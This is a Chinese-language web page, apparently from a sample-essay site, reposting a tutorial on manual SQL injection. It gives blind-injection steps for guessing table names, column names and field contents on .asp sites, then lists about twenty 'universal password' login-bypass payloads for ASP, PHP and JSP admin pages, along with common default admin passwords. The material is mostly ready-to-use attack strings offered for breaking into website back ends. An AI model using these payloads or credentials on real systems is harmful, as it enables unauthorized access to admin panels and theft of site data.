1200字范文,内容丰富有趣,写作的好帮手!
1200字范文 > SQL手工注入原理万能密码及默认密码登陆后台

SQL手工注入原理万能密码及默认密码登陆后台

时间:2020-09-22 11:15:42

相关推荐

SQL手工注入原理万能密码及默认密码登陆后台

SQL手工注入原理:

下面就是比较笨的方法了== 一个一个试 (* ̄rǒ ̄)

针对于.asp后缀网 + ?id_ 在后面加入下面代码,返回正确那就是无注入点,反正就是有注入点

一、什么是SQL注入

SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。

二、判定是否存在注入点

and 1=1 and 1=2

三、猜解数据库表名

and 0<>(select count(*) from 表名)

四、猜解数据库列名

and (select count(列名) from 猜到的表名)>0

五、猜解字段长度

and (select top 1 len(猜到的列名) from 猜到的表名)>0

六、猜解字符内容

and 1=(select count(*) from [猜到的表名] where left(猜到的列名,1)='a')

万能密码及默认密码登陆后台:

一、万能密码原理

万能密码漏洞都是因为提交字符未加过滤或过滤不严而导致的。

例如后台系统验证密码要求用户输入的密码和数据库里面的匹配,而用万能密码的方式,就是将验证的语句改成了验证成功的,逻辑运算符AND和OR的运算优先次序是:先运算AND运算符在运算OR运算符,这个漏洞是发生在登陆口,只有登陆口才会出现这样的漏洞。

二、万能密码大全

ASP 万能密码

1:"or "a"="a

2:')or('a'='a

3:or 1=1--

4:'or 1=1--

5:a'or' 1=1--

6:"or 1=1--

7:'or'a'='a

8:"or"="a'='a

9:'or''='

10:'or'='or'

11:1 or '1'='1'=1

12:1 or '1'='1' or 1=1

13:'OR 1=1%00

14:"or 1=1%00

15:'xor

16:用户名 ' UNION Select 1,1,1 FROM admin Where ''=' (替换表名admin) 密码 1

17: admin' or 'a'='a 密码随便

PHP 万能密码

1:'or 1=1/*

2:User: something

Pass: ' or '1'='1

JSP 万能密码:

1:1'or'1'='1:

2:admin' or 1=1/*

默认密码:

1:admin

2:admin888

3:123456

4:123123

5:(域名)

本内容不代表本网观点和政治立场,如有侵犯你的权益请联系我们处理。
网友评论
网友评论仅供其表达个人看法,并不表明网站立场。